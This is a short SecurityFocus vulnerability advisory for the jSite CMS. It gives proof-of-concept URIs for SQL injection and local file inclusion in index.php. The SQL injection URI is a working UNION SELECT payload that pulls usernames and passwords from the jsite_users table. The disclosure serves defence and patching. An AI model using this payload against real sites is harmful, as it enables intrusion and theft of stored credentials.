Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

jSite 'index.php' SQL Injection and Local File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

1. SQL-injection issue:
http://www.example.com/index.php?page=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a,user,pass),admin/**/from/**/jsite_users/*

2. Local file-include issue:
http://www.example.com/Script/index.php?module=[LFI]







 

Privacy Statement
Copyright 2009, SecurityFocus